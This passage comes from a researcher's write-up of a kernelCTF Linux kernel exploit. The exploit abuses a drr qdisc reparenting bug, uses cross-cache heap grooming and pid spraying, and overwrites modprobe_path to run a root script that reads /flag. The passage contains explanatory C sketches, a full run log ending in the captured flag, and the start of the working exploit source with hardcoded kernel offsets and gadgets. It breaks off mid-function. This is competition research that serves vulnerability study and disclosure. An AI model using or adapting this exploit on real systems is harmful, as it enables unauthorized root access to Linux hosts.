<p>Instead of messing with any arithmetic for determining how to increment each <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> byte until it becomes <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>, I just simulated each write in my exploit program. So I created a local copy of <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> and a local copy of <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code> and I simulated the increment logic one iteration at a time, making sure to actually execute the increment in kernel space as well. This way, I could basically just do the increment blind and know when it was done without doing any arithmetic really. Probably better ways to do this, but this was my first idea and it worked really well for me. This actually worked first try and I successfully got <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> changed to <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code>.</p>
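<p>A minimal sketch of that simulation idea is below. It is not the code from the exploit: <code class="language-plaintext highlighter-rouge">inc_long_at</code>, <code class="language-plaintext highlighter-rouge">simulate_overwrite</code> and <code class="language-plaintext highlighter-rouge">PATH_BUF_LEN</code> are hypothetical names, and it assumes a little-endian machine where each gadget invocation behaves like a 64-bit increment at the target address, so a wrapping byte carries into the bytes after it.</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical size for the local copy; it must leave at least 7 spare
 * bytes after the terminating NUL because every write touches 8 bytes. */
#define PATH_BUF_LEN 32

/* Apply one 64-bit increment at buf + off. On a little-endian host this
 * bumps buf[off] by one and carries into the following bytes on wrap. */
static void inc_long_at(uint8_t *buf, size_t off) {
    uint64_t v;
    memcpy(&v, buf + off, sizeof(v));
    v++;
    memcpy(buf + off, &v, sizeof(v));
}

/* Walk the string left to right, incrementing until each byte (including
 * the terminating NUL) matches the target. Carries only ever spill into
 * later bytes, which get fixed when the loop reaches them.
 * Returns the number of increments that were needed. */
static unsigned long simulate_overwrite(uint8_t *cur, const char *target) {
    size_t n = strlen(target) + 1;
    unsigned long writes = 0;

    for (size_t i = 0; i < n; i++) {
        while (cur[i] != (uint8_t)target[i]) {
            /* A real exploit would trigger the kernel-side increment here
             * and reset its state before the next iteration. */
            inc_long_at(cur, i);
            writes++;
        }
    }
    return writes;
}
```

<p>To use it, copy <code class="language-plaintext highlighter-rouge">/sbin/modprobe</code> into a zeroed <code class="language-plaintext highlighter-rouge">PATH_BUF_LEN</code>-byte buffer and call <code class="language-plaintext highlighter-rouge">simulate_overwrite</code> with <code class="language-plaintext highlighter-rouge">/proc/500/fd/3</code> as the target. Because the local copy tracks every carry, the loop knows when to slide to the next byte without any up-front arithmetic.</p>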

<p>In the namespace jail, you don’t know your pid ahead of time, so I had to use a trick suggested in the kCTF Discord by <a href="https://x.com/pqlqpql">@pqlqpql</a> a while ago, which is to just spray a certain number of child processes and guess a pid which is likely one of those children. This is very simple and clever and works very well because when you get a shell on the kCTF COS instance, you are on a fresh boot, so pids are very predictable. I found that spraying 500 child processes would reliably mean that pid 500 would be one of your children.</p>
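<p>The spray itself is nothing more than a fork loop. The sketch below uses hypothetical helper names (<code class="language-plaintext highlighter-rouge">spray_children</code>, <code class="language-plaintext highlighter-rouge">pid_was_sprayed</code>, <code class="language-plaintext highlighter-rouge">reap_children</code>) and only illustrates the idea. Note that <code class="language-plaintext highlighter-rouge">fork()</code> returns pids as seen from the caller’s pid namespace, so inside the jail the membership check would not tell you the host-side pid, which is exactly why the real exploit has to guess.</p>

```c
#include <signal.h>
#include <stddef.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fork up to n children that just idle. Stores their pids (as seen from
 * the caller's pid namespace) and returns how many were created. */
static size_t spray_children(pid_t *pids, size_t n) {
    size_t made = 0;

    for (size_t i = 0; i < n; i++) {
        pid_t pid = fork();
        if (pid < 0)
            break;              /* stop spraying on failure */
        if (pid == 0) {
            for (;;)
                pause();        /* child: sleep until killed */
        }
        pids[made++] = pid;
    }
    return made;
}

/* Returns 1 if guess is one of the sprayed pids, 0 otherwise. */
static int pid_was_sprayed(const pid_t *pids, size_t n, pid_t guess) {
    for (size_t i = 0; i < n; i++) {
        if (pids[i] == guess)
            return 1;
    }
    return 0;
}

/* Kill and reap every sprayed child. */
static void reap_children(const pid_t *pids, size_t n) {
    for (size_t i = 0; i < n; i++) {
        kill(pids[i], SIGKILL);
        waitpid(pids[i], NULL, 0);
    }
}
```

<p>Outside of a pid namespace you could call <code class="language-plaintext highlighter-rouge">spray_children</code> with a count of 500 and then ask <code class="language-plaintext highlighter-rouge">pid_was_sprayed</code> about pid 500 to see how predictable allocation is on a freshly booted machine.</p>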

<p>Using this, at the beginning of our exploit we just need the sprayed children to open a privesc script that will be run with kernel privileges so that their <code class="language-plaintext highlighter-rouge">/proc/self/fd/3</code> would be the privesc script. And to read the flag I basically just made the script do: <code class="language-plaintext highlighter-rouge">cat /flag &gt; /proc/500/fd/0</code> and had all of the children do blocking reads on their <code class="language-plaintext highlighter-rouge">STDIN</code> file descriptors. Whoever is pid 500 would print the flag contents to the terminal and it worked first try:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>[&gt;] Dropping scripts...
[&gt;] Spraying child pids...
[&gt;] Kernel base address: 0xffffffffa6000000
[&gt;] Kernfs buffer address: 0xffffffffa9267b80
[&gt;] Arbitrary write gadget address: 0xffffffffa6356310
[&gt;] Modprobe path address: 0xffffffffa8662e80
[&gt;] Return NULL gadget address: 0xffffffffa6d4ab80
[&gt;] Doing the unshare...
[&gt;] Bringing up lo interface...
[&gt;] Pinning our process to core-0...
[&gt;] Starting UDP listener...
[&gt;] Creating pipes...
[&gt;] Setting up initial classes...
[&gt;] Creating root qdisc...
[&gt;] Creating class 1:1...
[&gt;] Creating class 1:3...
[&gt;] Assigning plug qdisc to class 1:1...
[&gt;] Assigning pfifo qdisc to class 1:3...
[&gt;] Executing cross-cache stage-1...
[&gt;] Executing cross-cache stage-2...
[&gt;] Allocating victim class 1:2...
[&gt;] Executing bug to reparent qdisc to 1:2 from 1:3...
[&gt;] Displaying hierarchy setup...
class drr 1:1 root leaf 2: quantum 64Kb 
class drr 1:2 root leaf 3: quantum 64Kb 
class drr 1:3 root leaf 3: quantum 64Kb 
qdisc drr 1: dev lo root refcnt 2 
qdisc plug 2: dev lo parent 1:1 
qdisc pfifo 3: dev lo parent 1:3 refcnt 2 limit 1000p
[&gt;] Enqueueing packets in 1:1 and 1:2...
[   10.508490] drr_dequeue: plug qdisc 2: is non-work-conserving?
[&gt;] Deleting classes 1:1 and 1:2 and then cross-cache stage-3...
[   10.519000] ------------[ cut here ]------------
[   10.521778] list_del corruption, ffff8fdd50a008d0-&gt;next is NULL
[   10.525296] WARNING: CPU: 0 PID: 784 at lib/list_debug.c:49 __list_del_entry_valid+0x59/0xd0
[   10.530218] Modules linked in:
[   10.532091] CPU: 0 PID: 784 Comm: tc.bin Not tainted 5.15.173+ #1
[   10.535676] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014
[   10.540545] RIP: 0010:__list_del_entry_valid+0x59/0xd0
[   10.543555] Code: 48 8b 00 48 39 f8 75 67 48 8b 52 08 48 39 c2 75 74 b8 01 00 00 00 c3 cc cc cc cc 48 89 fe 48 c7 c7 80 71 cf a7 e8 e3a
[   10.554231] RSP: 0018:ffffa1020168b940 EFLAGS: 00010282
[   10.557286] RAX: 0000000000000000 RBX: ffff8fdd50a00880 RCX: 0000000000000000
[   10.561417] RDX: 0000000000000000 RSI: ffffa1020168b770 RDI: 00000000ffffffea
[   10.565575] RBP: 0000000000010003 R08: 00000000ffffdfff R09: 0000000000000001
[   10.570036] R10: 00000000ffffdfff R11: ffffffffa8669da0 R12: 0000000000000001
[   10.574238] R13: ffff8fdd44f8e000 R14: ffffffffa7ad11e0 R15: 0000000000010000
[   10.578407] FS:  000000001a406880(0000) GS:ffff8fdd5c400000(0000) knlGS:0000000000000000
[   10.583118] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   10.586532] CR2: 00000000005a6cc0 CR3: 0000000110d5a003 CR4: 0000000000370ef0
[   10.590718] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[   10.594898] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[   10.599087] Call Trace:
[   10.600704]  &lt;TASK&gt;
[   10.602011]  ? __warn+0x81/0x100
[   10.603979]  ? __list_del_entry_valid+0x59/0xd0
[   10.606673]  ? report_bug+0x99/0xc0
[   10.608785]  ? handle_bug+0x34/0x80
[   10.610901]  ? exc_invalid_op+0x13/0x60
[   10.613228]  ? asm_exc_invalid_op+0x16/0x20
[   10.615710]  ? __list_del_entry_valid+0x59/0xd0
[   10.618473]  drr_qlen_notify+0x12/0x50
[   10.620778]  qdisc_tree_reduce_backlog+0x84/0x160
[   10.623558]  drr_delete_class+0x104/0x210
[   10.625959]  tc_ctl_tclass+0x488/0x5a0
[   10.628214]  ? exc_page_fault+0x76/0x140
[   10.630556]  rtnetlink_rcv_msg+0x21e/0x350
[   10.633230]  ? security_sock_rcv_skb+0x31/0x50
[   10.635869]  ? rtnl_calcit.isra.0+0x130/0x130
[   10.638517]  netlink_rcv_skb+0x4e/0x100
[   10.640868]  netlink_unicast+0x231/0x370
[   10.643209]  netlink_sendmsg+0x250/0x4b0
[   10.645546]  __sock_sendmsg+0x5c/0x70
[   10.647746]  ____sys_sendmsg+0x25a/0x2a0
[   10.650116]  ? import_iovec+0x17/0x20
[   10.652338]  ___sys_sendmsg+0x96/0xd0
[   10.654575]  __sys_sendmsg+0x76/0xc0
[   10.656746]  do_syscall_64+0x3d/0x90
[   10.658970]  entry_SYSCALL_64_after_hwframe+0x6c/0xd6
[   10.662043] RIP: 0033:0x4e7697
[   10.663880] Code: 64 89 02 48 c7 c0 ff ff ff ff eb bb 0f 1f 80 00 00 00 00 f3 0f 1e fa 64 8b 04 25 18 00 00 00 85 c0 75 10 b8 2e 00 000
[   10.674696] RSP: 002b:00007ffc56673e38 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
[   10.679091] RAX: ffffffffffffffda RBX: 0000000067ae1e0c RCX: 00000000004e7697
[   10.683247] RDX: 0000000000000000 RSI: 00007ffc56673ea0 RDI: 0000000000000043
[   10.687411] RBP: 00007ffc56674fb0 R08: 00000000005978a0 R09: 000000001a4102b0
[   10.691609] R10: 000000001a4082a0 R11: 0000000000000246 R12: 0000000000578448
[   10.695807] R13: 000000000054449b R14: 00000000005af620 R15: 0000000000000001
[   10.699977]  &lt;/TASK&gt;
[   10.701360] ---[ end trace 8e001f66f1703586 ]---
[&gt;] Executing cross-cache stage-4...
[&gt;] Executing cross-cache stage-5 and reclaiming page...
[&gt;] Overwriting modprobe path...
[   11.859455] xt_cgroup: invalid path, errno=-2
[   11.864787] xt_cgroup: invalid path, errno=-2
[   11.869782] xt_cgroup: invalid path, errno=-2
[   11.874720] xt_cgroup: invalid path, errno=-2
[   11.879548] xt_cgroup: invalid path, errno=-2
[   11.884427] xt_cgroup: invalid path, errno=-2
[   11.889362] xt_cgroup: invalid path, errno=-2
[   11.894300] xt_cgroup: invalid path, errno=-2
[   11.899125] xt_cgroup: invalid path, errno=-2
[   11.904009] xt_cgroup: invalid path, errno=-2
[   16.861299] cgroup_mt_check_v2: 2317 callbacks suppressed
[   16.861303] xt_cgroup: invalid path, errno=-2
[   16.869908] xt_cgroup: invalid path, errno=-2
[   16.875051] xt_cgroup: invalid path, errno=-2
[   16.880257] xt_cgroup: invalid path, errno=-2
[   16.885424] xt_cgroup: invalid path, errno=-2
[   16.890615] xt_cgroup: invalid path, errno=-2
[   16.896175] xt_cgroup: invalid path, errno=-2
[   16.901367] xt_cgroup: invalid path, errno=-2
[   16.906582] xt_cgroup: invalid path, errno=-2
[   16.911806] xt_cgroup: invalid path, errno=-2
[&gt;] Modprobe path is *probably* overwritten lol!
kernelCTF{v1:cos-105-17412.535.34:SNIPPED}
./trigger.sh: 1: ����: not found
user@cos-105-17412:/tmp$ ^C
</code></pre></div></div>

<h2 id="thanks--misc">Thanks &amp;&amp; Misc</h2>
<p>Huge thanks to all the kCTF moderators like <a href="https://x.com/pwningsystems">Jordy</a> and <a href="https://x.com/koczkatamas">KT</a> who answer all my questions and are very charitable. Also big thanks to my friends <a href="https://x.com/chompie1337">Chompie</a> and <a href="https://x.com/Firzen14">Firzen</a> for being my sounding board and for being so supportive. Also thanks to <a href="https://x.com/u1f383">Pumpkin</a> for always helping me and answering DMs.</p>

<p>The exploit still has some artifacts in it because I did the initial development work on a 6.* kernel and then switched to a kCTF bzImage, which is kernel version 5.*. All of the nftables code for spraying tables with userdata is also still in the exploit. I kept that code in there to do the kmalloc-128 page reservation required to get my victim page sent back to the allocator. In a way, I did finally get to use <code class="language-plaintext highlighter-rouge">table-&gt;udata</code>.</p>

<h2 id="exploit">Exploit</h2>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define _GNU_SOURCE
#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdlib.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sched.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;fcntl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/socket.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;string.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;stdint.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/socket.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netlink.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/xfrm.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;errno.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/stat.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/utsname.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/resource.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;sys/wait.h&gt;</span><span class="cp">
</span>
<span class="cp">#include</span> <span class="cpf">&lt;libmnl/libmnl.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netfilter.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/netfilter/nf_tables.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;libnftnl/table.h&gt;</span><span class="c1"> </span><span class="cp">
</span>
<span class="c1">// Kernel base address</span>
<span class="kt">uint64_t</span> <span class="n">g_kernel_base</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Address of kernfs_pr_cont_buf</span>
<span class="kt">uint64_t</span> <span class="n">g_kernfs_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Offset of kernfs_pr_cont_buf from kernel base, per kernel version</span>
<span class="kt">uint64_t</span> <span class="n">kernfs_addr_off_6</span> <span class="o">=</span> <span class="mh">0x3691a80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">kernfs_addr_off_5</span> <span class="o">=</span> <span class="mh">0x3267b80</span><span class="p">;</span>

<span class="c1">// Offset for entry_SYSCALL_64_offset</span>
<span class="kt">uint64_t</span> <span class="n">g_entry_syscall_off</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">entry_syscall_off_6</span> <span class="o">=</span> <span class="mh">0x1400040</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">entry_syscall_off_5</span> <span class="o">=</span> <span class="mh">0x1200080</span><span class="p">;</span>

<span class="c1">// Our arbitrary write gadget clear_nlink</span>
<span class="kt">uint64_t</span> <span class="n">g_write_gadget_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">write_gadget_off_5</span> <span class="o">=</span> <span class="mh">0x356310</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">write_gadget_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Modprobe path addr</span>
<span class="kt">uint64_t</span> <span class="n">g_modprobe_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version </span>
<span class="kt">uint64_t</span> <span class="n">modprobe_off_5</span> <span class="o">=</span> <span class="mh">0x2662e80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">modprobe_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// A mutable write target that we use to overwrite modprobe one byte at a time</span>
<span class="kt">uint64_t</span> <span class="n">g_write_target</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Our Return NULL gadget</span>
<span class="kt">uint64_t</span> <span class="n">g_null_gadget_addr</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// Based on kernel version</span>
<span class="kt">uint64_t</span> <span class="n">null_gadget_off_5</span> <span class="o">=</span> <span class="mh">0xd4ab80</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">null_gadget_off_6</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="c1">// We target [rax + 0x450] with our gadget, so we subtract this from the ptr</span>
<span class="c1">// value in our fake buffer</span>
<span class="cp">#define WRITE_TARGET_OFFSET 0x450UL
</span>
<span class="c1">// Pin our process (and children from system() / fork()) to core-0</span>
<span class="kt">void</span> <span class="nf">pin_to_core_0</span><span class="p">()</span> <span class="p">{</span>
    <span class="n">cpu_set_t</span> <span class="n">mask</span><span class="p">;</span>
    <span class="n">CPU_ZERO</span><span class="p">(</span><span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>
    <span class="n">CPU_SET</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">);</span>

    <span class="k">if</span> <span class="p">(</span><span class="n">sched_setaffinity</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">mask</span><span class="p">),</span> <span class="o">&amp;</span><span class="n">mask</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"sched_setaffinity"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Write to a file so we can set our user ids</span>
<span class="kt">int</span> <span class="nf">write_mapping</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">path</span><span class="p">,</span> <span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">content</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">int</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="n">O_WRONLY</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">fd</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to open %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    
    <span class="k">if</span> <span class="p">(</span><span class="n">write</span><span class="p">(</span><span class="n">fd</span><span class="p">,</span> <span class="n">content</span><span class="p">,</span> <span class="n">strlen</span><span class="p">(</span><span class="n">content</span><span class="p">))</span> <span class="o">!=</span> <span class="n">strlen</span><span class="p">(</span><span class="n">content</span><span class="p">))</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to write to %s: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="n">close</span><span class="p">(</span><span class="n">fd</span><span class="p">);</span>
    <span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>

<span class="c1">// Unshare our namespaces so that we can get the caps we want</span>
<span class="kt">void</span> <span class="nf">unshare_stuff</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="c1">// Unshare into new user and network namespaces</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">unshare</span><span class="p">(</span><span class="n">CLONE_NEWUSER</span> <span class="o">|</span> <span class="n">CLONE_NEWNET</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"unshare failed: %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">strerror</span><span class="p">(</span><span class="n">errno</span><span class="p">));</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// First disable setgroups</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/setgroups"</span><span class="p">,</span> <span class="s">"deny"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to disable setgroups</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Then map our UID and GID</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/uid_map"</span><span class="p">,</span> <span class="s">"0 1000 1"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span> <span class="o">||</span>
        <span class="n">write_mapping</span><span class="p">(</span><span class="s">"/proc/self/gid_map"</span><span class="p">,</span> <span class="s">"0 1000 1"</span><span class="p">)</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to write ID mappings</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Bring up the loopback interface</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"[&gt;] Bringing up lo interface...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">system</span><span class="p">(</span><span class="s">"./ip.bin link set lo up"</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to bring up loopback interface.</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Start listener</span>
<span class="kt">void</span> <span class="nf">start_udp_listener</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">system</span><span class="p">(</span><span class="s">"nohup ./socat.bin -u UDP-RECV:8888 STDOUT &gt;/dev/null 2&gt;&amp;1 &amp;"</span><span class="p">);</span>
<span class="p">}</span>

<span class="cp">#define PIPE_MAX 32
#define PIPE_READ 0
#define PIPE_WRITE 1
</span>
<span class="c1">// An array to hold pipe fds</span>
<span class="kt">int</span> <span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">PIPE_MAX</span><span class="p">][</span><span class="mi">2</span><span class="p">];</span>

<span class="c1">// Allocate pipes </span>
<span class="kt">void</span> <span class="nf">allocate_pipes</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="k">if</span> <span class="p">(</span><span class="n">pipe</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">])</span> <span class="o">==</span> <span class="o">-</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
            <span class="n">perror</span><span class="p">(</span><span class="s">"pipe"</span><span class="p">);</span>
            <span class="n">exit</span><span class="p">(</span><span class="o">-</span><span class="mi">1</span><span class="p">);</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Attempt to reclaim our page by allocating pages to back the pipes</span>
<span class="kt">void</span> <span class="nf">reclaim_page</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
    <span class="kt">char</span> <span class="n">write_buf</span><span class="p">[</span><span class="mi">4096</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>
    <span class="n">memset</span><span class="p">(</span><span class="o">&amp;</span><span class="n">write_buf</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="sc">'B'</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>

    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">PIPE_MAX</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">write</span><span class="p">(</span><span class="n">g_pipes_arr</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">PIPE_WRITE</span><span class="p">],</span> <span class="n">write_buf</span><span class="p">,</span> <span class="mi">4096</span><span class="p">);</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="cp">#define NUM_SPRAY_OBJS 4096UL
#define USERDATA_SIZE 128UL
#define MNL_BUF_SIZE 4096UL
</span>
<span class="c1">// Global for user data, set once</span>
<span class="kt">char</span> <span class="n">g_userdata</span><span class="p">[</span><span class="n">USERDATA_SIZE</span><span class="p">];</span>

<span class="c1">// Creates a single nftables table to spray userdata</span>
<span class="kt">void</span> <span class="nf">create_table</span><span class="p">(</span><span class="k">const</span> <span class="kt">char</span> <span class="o">*</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">table_name</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">fprintf</span><span class="p">(</span><span class="n">stderr</span><span class="p">,</span> <span class="s">"Error: Table name is NULL</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">}</span>

    <span class="k">struct</span> <span class="n">mnl_socket</span> <span class="o">*</span><span class="n">mnl_sock</span><span class="p">;</span>
    <span class="k">struct</span> <span class="n">mnl_nlmsg_batch</span> <span class="o">*</span><span class="n">batch</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="n">MNL_BUF_SIZE</span><span class="p">];</span>

    <span class="c1">// Open Netlink socket</span>
    <span class="n">mnl_sock</span> <span class="o">=</span> <span class="n">mnl_socket_open</span><span class="p">(</span><span class="n">NETLINK_NETFILTER</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">mnl_sock</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_open"</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Connect to Netlink</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">mnl_socket_bind</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="n">MNL_SOCKET_AUTOPID</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">perror</span><span class="p">(</span><span class="s">"mnl_socket_bind"</span><span class="p">);</span>
        <span class="n">mnl_socket_close</span><span class="p">(</span><span class="n">mnl_sock</span><span class="p">);</span>
        <span class="n">exit</span><span class="p">(</span><span class="n">EXIT_FAILURE</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Initialize Netlink batch (one message per batch)</span>
    <span class="n">memset</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="mi">0</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>
    <span class="n">batch</span> <span class="o">=</span> <span class="n">mnl_nlmsg_batch_start</span><span class="p">(</span><span class="n">buf</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">buf</span><span class="p">));</span>

    <span class="kt">int</span> <span class="n">seq</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
